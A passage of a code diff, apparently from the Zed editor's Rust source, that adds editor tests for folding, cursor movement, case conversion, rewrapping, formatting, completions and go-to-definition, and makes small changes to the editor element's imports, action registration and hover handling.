+ cx.update_editor(|editor, window, cx| {
+ editor.fold_at_level(&FoldAtLevel(1), window, cx);
+ assert_eq!(
+ editor.display_text(cx),
+ indoc! {"
+ fn main() {⋯
+ }
+ "},
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_fold_with_unindented_multiline_block_comment(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let mut cx = EditorTestContext::new(cx).await;
+
+ let language = Arc::new(
+ Language::new(
+ LanguageConfig::default(),
+ Some(tree_sitter_rust::LANGUAGE.into()),
+ )
+ .with_queries(LanguageQueries {
+ overrides: Some(Cow::from(indoc! {"
+ [
+ (string_literal)
+ (raw_string_literal)
+ ] @string
+ [
+ (line_comment)
+ (block_comment)
+ ] @comment.inclusive
+ "})),
+ ..Default::default()
+ })
+ .expect("Could not parse queries"),
+ );
+
+ cx.update_buffer(|buffer, cx| buffer.set_language(Some(language), cx));
+ cx.set_state(indoc! {"
+ fn main() {
+ let x = 1;
+ /*
+ unindented comment line
+ */
+ }ˇ
+ "});
+
+ cx.update_editor(|editor, window, cx| {
+ editor.fold_at_level(&FoldAtLevel(1), window, cx);
+ assert_eq!(
+ editor.display_text(cx),
+ indoc! {"
+ fn main() {⋯
+ }
+ "},
+ );
+ });
+}
+
#[gpui::test]
fn test_fold_at_level(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -1867,6 +2033,56 @@ fn test_beginning_end_of_line(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+fn test_beginning_of_line_single_line_editor(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let editor = cx.add_window(|window, cx| Editor::single_line(window, cx));
+
+ _ = editor.update(cx, |editor, window, cx| {
+ editor.set_text(" indented text", window, cx);
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_display_ranges([
+ DisplayPoint::new(DisplayRow(0), 10)..DisplayPoint::new(DisplayRow(0), 10)
+ ]);
+ });
+
+ editor.move_to_beginning_of_line(
+ &MoveToBeginningOfLine {
+ stop_at_soft_wraps: true,
+ stop_at_indent: true,
+ },
+ window,
+ cx,
+ );
+ assert_eq!(
+ display_ranges(editor, cx),
+ &[DisplayPoint::new(DisplayRow(0), 0)..DisplayPoint::new(DisplayRow(0), 0)]
+ );
+ });
+
+ _ = editor.update(cx, |editor, window, cx| {
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_display_ranges([
+ DisplayPoint::new(DisplayRow(0), 10)..DisplayPoint::new(DisplayRow(0), 10)
+ ]);
+ });
+
+ editor.select_to_beginning_of_line(
+ &SelectToBeginningOfLine {
+ stop_at_soft_wraps: true,
+ stop_at_indent: true,
+ },
+ window,
+ cx,
+ );
+ assert_eq!(
+ display_ranges(editor, cx),
+ &[DisplayPoint::new(DisplayRow(0), 10)..DisplayPoint::new(DisplayRow(0), 0)]
+ );
+ });
+}
+
#[gpui::test]
fn test_beginning_end_of_line_ignore_soft_wrap(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -6217,6 +6433,77 @@ async fn test_manipulate_text(cx: &mut TestAppContext) {
«HeLlO, wOrLD!ˇ»
"});
+ // Test that case conversions backed by `to_case` preserve leading/trailing whitespace.
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_title_case(&ConvertToTitleCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « Hello Worldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| {
+ e.convert_to_upper_camel_case(&ConvertToUpperCamelCase, window, cx)
+ });
+ cx.assert_editor_state(indoc! {"
+ « HelloWorldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| {
+ e.convert_to_lower_camel_case(&ConvertToLowerCamelCase, window, cx)
+ });
+ cx.assert_editor_state(indoc! {"
+ « helloWorldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_snake_case(&ConvertToSnakeCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « hello_worldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_kebab_case(&ConvertToKebabCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « hello-worldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello worldˇ»
+ "});
+ cx.update_editor(|e, window, cx| {
+ e.convert_to_sentence_case(&ConvertToSentenceCase, window, cx)
+ });
+ cx.assert_editor_state(indoc! {"
+ « Hello worldˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello world\t\tˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_title_case(&ConvertToTitleCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « Hello World\t\tˇ»
+ "});
+
+ cx.set_state(indoc! {"
+ « hello world\t\tˇ»
+ "});
+ cx.update_editor(|e, window, cx| e.convert_to_snake_case(&ConvertToSnakeCase, window, cx));
+ cx.assert_editor_state(indoc! {"
+ « hello_world\t\tˇ»
+ "});
+
// Test selections with `line_mode() = true`.
cx.update_editor(|editor, _window, _cx| editor.selections.set_line_mode(true));
cx.set_state(indoc! {"
@@ -7175,6 +7462,48 @@ async fn test_rewrap(cx: &mut TestAppContext) {
also very long and should not merge
with the numbered item.ˇ»
"},
+ markdown_language.clone(),
+ &mut cx,
+ );
+
+ // Test that empty selection rewrap on a numbered list item does not merge adjacent items
+ assert_rewrap(
+ indoc! {"
+ 1. This is the first numbered list item that is very long and needs to be wrapped properly.
+ 2. ˇThis is the second numbered list item that is also very long and needs to be wrapped.
+ 3. This is the third numbered list item, shorter.
+ "},
+ indoc! {"
+ 1. This is the first numbered list item
+ that is very long and needs to be
+ wrapped properly.
+ 2. ˇThis is the second numbered list item
+ that is also very long and needs to
+ be wrapped.
+ 3. This is the third numbered list item,
+ shorter.
+ "},
+ markdown_language.clone(),
+ &mut cx,
+ );
+
+ // Test that empty selection rewrap on a bullet list item does not merge adjacent items
+ assert_rewrap(
+ indoc! {"
+ - This is the first bullet item that is very long and needs wrapping properly here.
+ - ˇThis is the second bullet item that is also very long and needs to be wrapped.
+ - This is the third bullet item, shorter.
+ "},
+ indoc! {"
+ - This is the first bullet item that is
+ very long and needs wrapping properly
+ here.
+ - ˇThis is the second bullet item that is
+ also very long and needs to be
+ wrapped.
+ - This is the third bullet item,
+ shorter.
+ "},
markdown_language,
&mut cx,
);
@@ -9324,6 +9653,28 @@ async fn test_add_selection_above_below_multi_cursor_existing_state(cx: &mut Tes
));
}
+#[gpui::test]
+async fn test_add_selection_above_below_multibyte(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+ let mut cx = EditorTestContext::new(cx).await;
+
+ // Cursor after "Häl" (byte column 4, char column 3) should align to
+ // char column 3 on the ASCII line below, not byte column 4.
+ cx.set_state(indoc!(
+ r#"Hälˇlö
+ Hallo"#
+ ));
+
+ cx.update_editor(|editor, window, cx| {
+ editor.add_selection_below(&Default::default(), window, cx);
+ });
+
+ cx.assert_editor_state(indoc!(
+ r#"Hälˇlö
+ Halˇlo"#
+ ));
+}
+
#[gpui::test]
async fn test_select_next(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -9935,7 +10286,7 @@ async fn test_select_larger_smaller_syntax_node(cx: &mut TestAppContext) {
use mod1::mod2::{mod3, «mod4ˇ»};
fn fn_1«ˇ(param1: bool, param2: &str)» {
- let var1 = "«ˇtext»";
+ let var1 = "«textˇ»";
}
"#},
cx,
@@ -10007,7 +10358,7 @@ async fn test_select_larger_smaller_syntax_node(cx: &mut TestAppContext) {
use mod1::mod2::{mod3, «mod4ˇ»};
fn fn_1«ˇ(param1: bool, param2: &str)» {
- let var1 = "«ˇtext»";
+ let var1 = "«textˇ»";
}
"#},
cx,
@@ -10076,7 +10427,32 @@ async fn test_select_larger_smaller_syntax_node(cx: &mut TestAppContext) {
use mod1::mod2::«{mod3, mod4}ˇ»;
fn fn_1«ˇ(param1: bool, param2: &str)» {
- let var1 = "«ˇtext»";
+ let var1 = "«textˇ»";
+ }
+ "#},
+ cx,
+ );
+ });
+
+ // Ensure multiple cursors have consistent direction after expanding
+ editor.update_in(cx, |editor, window, cx| {
+ editor.unfold_all(&UnfoldAll, window, cx);
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_display_ranges([
+ DisplayPoint::new(DisplayRow(0), 25)..DisplayPoint::new(DisplayRow(0), 25),
+ DisplayPoint::new(DisplayRow(3), 18)..DisplayPoint::new(DisplayRow(3), 18),
+ ]);
+ });
+ editor.select_larger_syntax_node(&SelectLargerSyntaxNode, window, cx);
+ });
+ editor.update(cx, |editor, cx| {
+ assert_text_with_selections(
+ editor,
+ indoc! {r#"
+ use mod1::mod2::{mod3, «mod4ˇ»};
+
+ fn fn_1(param1: bool, param2: &str) {
+ let var1 = "«textˇ»";
}
"#},
cx,
@@ -14272,6 +14648,107 @@ async fn test_organize_imports_manual_trigger(cx: &mut TestAppContext) {
);
}
+#[gpui::test]
+async fn test_formatter_failure_does_not_abort_subsequent_formatters(cx: &mut TestAppContext) {
+ init_test(cx, |settings| {
+ settings.defaults.formatter = Some(FormatterList::Vec(vec![
+ Formatter::LanguageServer(settings::LanguageServerFormatterSpecifier::Current),
+ Formatter::CodeAction("organize-imports".into()),
+ ]))
+ });
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_file(path!("/file.rs"), "fn main() {}\n".into())
+ .await;
+
+ let project = Project::test(fs, [path!("/").as_ref()], cx).await;
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang());
+
+ let mut fake_servers = language_registry.register_fake_lsp(
+ "Rust",
+ FakeLspAdapter {
+ capabilities: lsp::ServerCapabilities {
+ document_formatting_provider: Some(lsp::OneOf::Left(true)),
+ code_action_provider: Some(lsp::CodeActionProviderCapability::Simple(true)),
+ ..Default::default()
+ },
+ ..Default::default()
+ },
+ );
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/file.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx));
+ let (editor, cx) = cx.add_window_view(|window, cx| {
+ build_editor_with_project(project.clone(), buffer, window, cx)
+ });
+
+ let fake_server = fake_servers.next().await.unwrap();
+
+ // Formatter #1 (LanguageServer) returns an error to simulate failure
+ fake_server.set_request_handler::<lsp::request::Formatting, _, _>(
+ move |_params, _| async move { Err(anyhow::anyhow!("Simulated formatter failure")) },
+ );
+
+ // Formatter #2 (CodeAction) returns a successful edit
+ fake_server.set_request_handler::<lsp::request::CodeActionRequest, _, _>(
+ move |_params, _| async move {
+ let uri = lsp::Uri::from_file_path(path!("/file.rs")).unwrap();
+ Ok(Some(vec![lsp::CodeActionOrCommand::CodeAction(
+ lsp::CodeAction {
+ kind: Some("organize-imports".into()),
+ edit: Some(lsp::WorkspaceEdit::new(
+ [(
+ uri,
+ vec![lsp::TextEdit::new(
+ lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 0)),
+ "use std::io;\n".to_string(),
+ )],
+ )]
+ .into_iter()
+ .collect(),
+ )),
+ ..Default::default()
+ },
+ )]))
+ },
+ );
+
+ fake_server.set_request_handler::<lsp::request::CodeActionResolveRequest, _, _>({
+ move |params, _| async move { Ok(params) }
+ });
+
+ editor
+ .update_in(cx, |editor, window, cx| {
+ editor.perform_format(
+ project.clone(),
+ FormatTrigger::Manual,
+ FormatTarget::Buffers(editor.buffer().read(cx).all_buffers()),
+ window,
+ cx,
+ )
+ })
+ .unwrap()
+ .await;
+
+ // Formatter #1 (LanguageServer) failed, but formatter #2 (CodeAction) should have applied
+ editor.update(cx, |editor, cx| {
+ assert_eq!(editor.text(cx), "use std::io;\nfn main() {}\n");
+ });
+
+ // The entire format operation should undo as one transaction
+ editor.update_in(cx, |editor, window, cx| {
+ editor.undo(&Default::default(), window, cx);
+ assert_eq!(editor.text(cx), "fn main() {}\n");
+ });
+}
+
#[gpui::test]
async fn test_concurrent_format_requests(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -19206,6 +19683,260 @@ fn test_split_words_for_snippet_prefix() {
assert_eq!(split("a.s"), &["s", ".s", "a.s"]);
}
+#[gpui::test]
+async fn test_move_to_syntax_node_relative_jumps(tcx: &mut TestAppContext) {
+ init_test(tcx, |_| {});
+
+ let mut cx = EditorLspTestContext::new(
+ Arc::into_inner(markdown_lang()).unwrap(),
+ Default::default(),
+ tcx,
+ )
+ .await;
+
+ async fn assert(offset: i8, before: &str, after: &str, cx: &mut EditorLspTestContext) {
+ let _state_context = cx.set_state(before);
+ cx.run_until_parked();
+ cx.update_editor(|editor, window, cx| editor.go_to_symbol_by_offset(window, cx, offset))
+ .await
+ .unwrap();
+ cx.run_until_parked();
+ cx.assert_editor_state(after);
+ }
+
+ const ABOVE: i8 = -1;
+ const BELOW: i8 = 1;
+
+ assert(
+ ABOVE,
+ indoc! {"
+ # Foo
+
+ ˇFoo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ ˇ# Foo
+
+ Foo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ ABOVE,
+ indoc! {"
+ ˇ# Foo
+
+ Foo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ ˇ# Foo
+
+ Foo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ ˇ# Foo
+
+ Foo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ ˇ# Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ # Foo
+
+ ˇFoo foo foo
+
+ # Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ ˇ# Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ ˇ# Bar
+
+ Bar bar bar
+ "},
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ ˇ# Bar
+
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ # Bar
+ ˇ
+ Bar bar bar
+ "},
+ indoc! {"
+ # Foo
+
+ Foo foo foo
+
+ # Bar
+ ˇ
+ Bar bar bar
+ "},
+ &mut cx,
+ )
+ .await;
+}
+
+#[gpui::test]
+async fn test_move_to_syntax_node_relative_dead_zone(tcx: &mut TestAppContext) {
+ init_test(tcx, |_| {});
+
+ let mut cx = EditorLspTestContext::new(
+ Arc::into_inner(rust_lang()).unwrap(),
+ Default::default(),
+ tcx,
+ )
+ .await;
+
+ async fn assert(offset: i8, before: &str, after: &str, cx: &mut EditorLspTestContext) {
+ let _state_context = cx.set_state(before);
+ cx.run_until_parked();
+ cx.update_editor(|editor, window, cx| editor.go_to_symbol_by_offset(window, cx, offset))
+ .await
+ .unwrap();
+ cx.run_until_parked();
+ cx.assert_editor_state(after);
+ }
+
+ const ABOVE: i8 = -1;
+ const BELOW: i8 = 1;
+
+ assert(
+ ABOVE,
+ indoc! {"
+ fn foo() {
+ // foo fn
+ }
+
+ ˇ// this zone is not inside any top level outline node
+
+ fn bar() {
+ // bar fn
+ let _ = 2;
+ }
+ "},
+ indoc! {"
+ ˇfn foo() {
+ // foo fn
+ }
+
+ // this zone is not inside any top level outline node
+
+ fn bar() {
+ // bar fn
+ let _ = 2;
+ }
+ "},
+ &mut cx,
+ )
+ .await;
+
+ assert(
+ BELOW,
+ indoc! {"
+ fn foo() {
+ // foo fn
+ }
+
+ ˇ// this zone is not inside any top level outline node
+
+ fn bar() {
+ // bar fn
+ let _ = 2;
+ }
+ "},
+ indoc! {"
+ fn foo() {
+ // foo fn
+ }
+
+ // this zone is not inside any top level outline node
+
+ ˇfn bar() {
+ // bar fn
+ let _ = 2;
+ }
+ "},
+ &mut cx,
+ )
+ .await;
+}
+
#[gpui::test]
async fn test_move_to_enclosing_bracket(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -19766,6 +20497,100 @@ async fn test_completions_with_additional_edits(cx: &mut TestAppContext) {
cx.assert_editor_state("fn main() { let a = Some(2)ˇ; }");
}
+#[gpui::test]
+async fn test_completions_with_additional_edits_and_multiple_cursors(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let mut cx = EditorLspTestContext::new_typescript(
+ lsp::ServerCapabilities {
+ completion_provider: Some(lsp::CompletionOptions {
+ resolve_provider: Some(true),
+ ..Default::default()
+ }),
+ ..Default::default()
+ },
+ cx,
+ )
+ .await;
+
+ cx.set_state(
+ "import { «Fooˇ» } from './types';\n\nclass Bar {\n method(): «Fooˇ» { return new Foo(); }\n}",
+ );
+
+ cx.simulate_keystroke("F");
+ cx.simulate_keystroke("o");
+
+ let completion_item = lsp::CompletionItem {
+ label: "FooBar".into(),
+ kind: Some(lsp::CompletionItemKind::CLASS),
+ text_edit: Some(lsp::CompletionTextEdit::Edit(lsp::TextEdit {
+ range: lsp::Range {
+ start: lsp::Position {
+ line: 3,
+ character: 14,
+ },
+ end: lsp::Position {
+ line: 3,
+ character: 16,
+ },
+ },
+ new_text: "FooBar".to_string(),
+ })),
+ additional_text_edits: Some(vec![lsp::TextEdit {
+ range: lsp::Range {
+ start: lsp::Position {
+ line: 0,
+ character: 9,
+ },
+ end: lsp::Position {
+ line: 0,
+ character: 11,
+ },
+ },
+ new_text: "FooBar".to_string(),
+ }]),
+ ..Default::default()
+ };
+
+ let closure_completion_item = completion_item.clone();
+ let mut request = cx.set_request_handler::<lsp::request::Completion, _, _>(move |_, _, _| {
+ let task_completion_item = closure_completion_item.clone();
+ async move {
+ Ok(Some(lsp::CompletionResponse::Array(vec![
+ task_completion_item,
+ ])))
+ }
+ });
+
+ request.next().await;
+
+ cx.condition(|editor, _| editor.context_menu_visible())
+ .await;
+ let apply_additional_edits = cx.update_editor(|editor, window, cx| {
+ editor
+ .confirm_completion(&ConfirmCompletion::default(), window, cx)
+ .unwrap()
+ });
+
+ cx.assert_editor_state(
+ "import { FooBarˇ } from './types';\n\nclass Bar {\n method(): FooBarˇ { return new Foo(); }\n}",
+ );
+
+ cx.set_request_handler::<lsp::request::ResolveCompletionItem, _, _>(move |_, _, _| {
+ let task_completion_item = completion_item.clone();
+ async move { Ok(task_completion_item) }
+ })
+ .next()
+ .await
+ .unwrap();
+
+ apply_additional_edits.await.unwrap();
+
+ cx.assert_editor_state(
+ "import { FooBarˇ } from './types';\n\nclass Bar {\n method(): FooBarˇ { return new Foo(); }\n}",
+ );
+}
+
#[gpui::test]
async fn test_completions_resolve_updates_labels_if_filter_text_matches(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -24203,6 +25028,163 @@ async fn test_goto_definition_no_fallback(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_goto_definition_close_ranges_open_singleton(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+ let mut cx = EditorLspTestContext::new_rust(
+ lsp::ServerCapabilities {
+ definition_provider: Some(lsp::OneOf::Left(true)),
+ ..lsp::ServerCapabilities::default()
+ },
+ cx,
+ )
+ .await;
+
+ // File content: 10 lines with functions defined on lines 3, 5, and 7 (0-indexed).
+ // With the default excerpt_context_lines of 2, ranges that are within
+ // 2 * 2 = 4 rows of each other should be grouped into one excerpt.
+ cx.set_state(
+ &r#"fn caller() {
+ let _ = ˇtarget();
+ }
+ fn target_a() {}
+
+ fn target_b() {}
+
+ fn target_c() {}
+ "#
+ .unindent(),
+ );
+
+ // Return two definitions that are close together (lines 3 and 5, gap of 2 rows)
+ cx.set_request_handler::<lsp::request::GotoDefinition, _, _>(move |url, _, _| async move {
+ Ok(Some(lsp::GotoDefinitionResponse::Array(vec![
+ lsp::Location {
+ uri: url.clone(),
+ range: lsp::Range::new(lsp::Position::new(3, 3), lsp::Position::new(3, 11)),
+ },
+ lsp::Location {
+ uri: url,
+ range: lsp::Range::new(lsp::Position::new(5, 3), lsp::Position::new(5, 11)),
+ },
+ ])))
+ });
+
+ let navigated = cx
+ .update_editor(|editor, window, cx| editor.go_to_definition(&GoToDefinition, window, cx))
+ .await
+ .expect("Failed to navigate to definitions");
+ assert_eq!(navigated, Navigated::Yes);
+
+ let editors = cx.update_workspace(|workspace, _, cx| {
+ workspace.items_of_type::<Editor>(cx).collect::<Vec<_>>()
+ });
+ cx.update_editor(|_, _, _| {
+ assert_eq!(
+ editors.len(),
+ 1,
+ "Close ranges should navigate in-place without opening a new editor"
+ );
+ });
+
+ // Both target ranges should be selected
+ cx.assert_editor_state(
+ &r#"fn caller() {
+ let _ = target();
+ }
+ fn «target_aˇ»() {}
+
+ fn «target_bˇ»() {}
+
+ fn target_c() {}
+ "#
+ .unindent(),
+ );
+}
+
+#[gpui::test]
+async fn test_goto_definition_far_ranges_open_multibuffer(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+ let mut cx = EditorLspTestContext::new_rust(
+ lsp::ServerCapabilities {
+ definition_provider: Some(lsp::OneOf::Left(true)),
+ ..lsp::ServerCapabilities::default()
+ },
+ cx,
+ )
+ .await;
+
+ // Create a file with definitions far apart (more than 2 * excerpt_context_lines rows).
+ cx.set_state(
+ &r#"fn caller() {
+ let _ = ˇtarget();
+ }
+ fn target_a() {}
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ fn target_b() {}
+ "#
+ .unindent(),
+ );
+
+ // Return two definitions that are far apart (lines 3 and 19, gap of 16 rows)
+ cx.set_request_handler::<lsp::request::GotoDefinition, _, _>(move |url, _, _| async move {
+ Ok(Some(lsp::GotoDefinitionResponse::Array(vec![
+ lsp::Location {
+ uri: url.clone(),
+ range: lsp::Range::new(lsp::Position::new(3, 3), lsp::Position::new(3, 11)),
+ },
+ lsp::Location {
+ uri: url,
+ range: lsp::Range::new(lsp::Position::new(19, 3), lsp::Position::new(19, 11)),
+ },
+ ])))
+ });
+
+ let navigated = cx
+ .update_editor(|editor, window, cx| editor.go_to_definition(&GoToDefinition, window, cx))
+ .await
+ .expect("Failed to navigate to definitions");
+ assert_eq!(navigated, Navigated::Yes);
+
+ let editors = cx.update_workspace(|workspace, _, cx| {
+ workspace.items_of_type::<Editor>(cx).collect::<Vec<_>>()
+ });
+ cx.update_editor(|_, _, test_editor_cx| {
+ assert_eq!(
+ editors.len(),
+ 2,
+ "Far apart ranges should open a new multibuffer editor"
+ );
+ let multibuffer_editor = editors
+ .into_iter()
+ .find(|editor| *editor != test_editor_cx.entity())
+ .expect("Should have a multibuffer editor");
+ let multibuffer_text = multibuffer_editor.read(test_editor_cx).text(test_editor_cx);
+ assert!(
+ multibuffer_text.contains("target_a"),
+ "Multibuffer should contain the first definition"
+ );
+ assert!(
+ multibuffer_text.contains("target_b"),
+ "Multibuffer should contain the second definition"
+ );
+ });
+}
+
#[gpui::test]
async fn test_find_all_references_editor_reuse(cx: &mut TestAppContext) {
init_test(cx, |_| {});
@@ -41,26 +41,23 @@ use git::{Oid, blame::BlameEntry, commit::ParsedCommitMessage, status::FileStatu
use gpui::{
Action, Along, AnyElement, App, AppContext, AvailableSpace, Axis as ScrollbarAxis, BorderStyle,
Bounds, ClickEvent, ClipboardItem, ContentMask, Context, Corner, Corners, CursorStyle,
- DispatchPhase, Edges, Element, ElementInputHandler, Entity, Focusable as _, FontId, FontWeight,
- GlobalElementId, Hitbox, HitboxBehavior, Hsla, InteractiveElement, IntoElement, IsZero,
- KeybindingKeystroke, Length, Modifiers, ModifiersChangedEvent, MouseButton, MouseClickEvent,
- MouseDownEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, PaintQuad, ParentElement,
- Pixels, PressureStage, ScrollDelta, ScrollHandle, ScrollWheelEvent, ShapedLine, SharedString,
- Size, StatefulInteractiveElement, Style, Styled, StyledText, TextAlign, TextRun,
- TextStyleRefinement, WeakEntity, Window, anchored, deferred, div, fill, linear_color_stop,
- linear_gradient, outline, pattern_slash, point, px, quad, relative, size, solid_background,
- transparent_black,
+ DispatchPhase, Edges, Element, ElementInputHandler, Entity, Focusable as _, Font, FontId,
+ FontWeight, GlobalElementId, Hitbox, HitboxBehavior, Hsla, InteractiveElement, IntoElement,
+ IsZero, Length, Modifiers, ModifiersChangedEvent, MouseButton, MouseClickEvent, MouseDownEvent,
+ MouseMoveEvent, MousePressureEvent, MouseUpEvent, PaintQuad, ParentElement, Pixels,
+ PressureStage, ScrollDelta, ScrollHandle, ScrollWheelEvent, ShapedLine, SharedString, Size,
+ StatefulInteractiveElement, Style, Styled, StyledText, TextAlign, TextRun, TextStyleRefinement,
+ WeakEntity, Window, anchored, deferred, div, fill, linear_color_stop, linear_gradient, outline,
+ pattern_slash, point, px, quad, relative, size, solid_background, transparent_black,
};
use itertools::Itertools;
-use language::{IndentGuideSettings, language_settings::ShowWhitespaceSetting};
+use language::{HighlightedText, IndentGuideSettings, language_settings::ShowWhitespaceSetting};
use markdown::Markdown;
use multi_buffer::{
Anchor, ExcerptId, ExcerptInfo, ExpandExcerptDirection, ExpandInfo, MultiBufferPoint,
MultiBufferRow, RowInfo,
};
-use edit_prediction_types::EditPredictionGranularity;
-
use project::{
DisableAiSettings, Entry, ProjectPath,
debugger::breakpoint_store::{Breakpoint, BreakpointSessionState},
@@ -98,7 +95,7 @@ use util::{RangeExt, ResultExt, debug_panic};
use workspace::{
CollaboratorId, ItemHandle, ItemSettings, OpenInTerminal, OpenTerminal, RevealInProjectPanel,
Workspace,
- item::{BreadcrumbText, Item, ItemBufferKind},
+ item::{Item, ItemBufferKind},
};
/// Determines what kinds of highlights should be applied to a lines background.
@@ -540,6 +537,8 @@ impl EditorElement {
register_action(editor, window, Editor::go_to_next_change);
register_action(editor, window, Editor::go_to_prev_reference);
register_action(editor, window, Editor::go_to_next_reference);
+ register_action(editor, window, Editor::go_to_previous_symbol);
+ register_action(editor, window, Editor::go_to_next_symbol);
register_action(editor, window, |editor, action, window, cx| {
if let Some(task) = editor.format(action, window, cx) {
@@ -651,6 +650,7 @@ impl EditorElement {
register_action(editor, window, Editor::enable_breakpoint);
register_action(editor, window, Editor::disable_breakpoint);
register_action(editor, window, Editor::toggle_read_only);
+ register_action(editor, window, Editor::align_selections);
if editor.read(cx).enable_wrap_selections_in_tag(cx) {
register_action(editor, window, Editor::wrap_selections_in_tag);
}
@@ -1243,7 +1243,7 @@ impl EditorElement {
let gutter_hitbox = &position_map.gutter_hitbox;
let modifiers = event.modifiers;
let text_hovered = text_hitbox.is_hovered(window);
- let gutter_hovered = gutter_hitbox.bounds.contains(&event.position);
+ let gutter_hovered = gutter_hitbox.is_hovered(window);
editor.set_gutter_hovered(gutter_hovered, cx);
editor.show_mouse_cursor(cx);
@@ -1462,6 +1462,7 @@ impl EditorElement {
if text_hovered {
editor.update_hovered_link(
point_for_position,
+ Some(event.position),
&position_map.snapshot,
modifiers,
window,
@@ -1473,12 +1474,13 @@ impl EditorElement {
.snapshot
.buffer_snapshot()
.anchor_before(point.to_offset(&position_map.snapshot, Bias::Left));
- hover_at(editor, Some(anchor), window, cx);
+ hover_at(editor, Some(anchor), Some(event.position), window, cx);
Self::update_visible_cursor(editor, point, position_map, window, cx);
} else {
editor.update_inlay_link_and_hover_points(
&position_map.snapshot,
point_for_position,
+ Some(event.position),
modifiers.secondary(),
modifiers.shift,
window,
@@ -1487,7 +1489,7 @@ impl EditorElement {
}
} else {
editor.hide_hovered_link(cx);
- hover_at(editor, None, window, cx);
+ hover_at(editor, None, Some(event.position), window, cx);
}
}
@@ -3275,9 +3277,9 @@ impl EditorElement {
snapshot.display_point_to_point(DisplayPoint::new(range.end, 0), Bias::Right);
editor
- .tasks
- .iter()
- .filter_map(|(_, tasks)| {
+ .runnables
+ .all_runnables()
+ .filter_map(|tasks| {
let multibuffer_point = tasks.offset.to_point(&snapshot.buffer_snapshot());
if multibuffer_point < offset_range_start
|| multibuffer_point > offset_range_end
@@ -4595,7 +4597,6 @@ impl EditorElement {
let mut lines = Vec::<StickyHeaderLine>::new();
for StickyHeader {
- item,
sticky_row,
start_point,
offset,
@@ -4635,7 +4636,6 @@ impl EditorElement {
line_height * offset as f32,
line,
line_number,
- item.range.start,
line_height,
scroll_pixel_position,
content_origin,
@@ -4701,7 +4701,6 @@ impl EditorElement {
end_rows.push(end_row);
rows.push(StickyHeader {
- item: item.clone(),
sticky_row,
start_point,
offset,
@@ -4833,17 +4832,11 @@ impl EditorElement {
let edit_prediction = if edit_prediction_popover_visible {
self.editor.update(cx, move |editor, cx| {
- let accept_binding = editor.accept_edit_prediction_keybind(
- EditPredictionGranularity::Full,
- window,
- cx,
- );
let mut element = editor.render_edit_prediction_cursor_popover(
min_width,
max_width,
cursor_point,
style,
- accept_binding.keystroke(),
window,
cx,
)?;
@@ -6705,22 +6698,33 @@ impl EditorElement {
}
});
+ let position_map = layout.position_map.clone();
+
for (line_index, line) in sticky_headers.lines.iter().enumerate() {
let editor = self.editor.clone();
let hitbox = line.hitbox.clone();
- let target_anchor = line.target_anchor;
+ let row = line.row;
+ let line_layout = line.line.clone();
+ let position_map = position_map.clone();
window.on_mouse_event(move |event: &MouseDownEvent, phase, window, cx| {
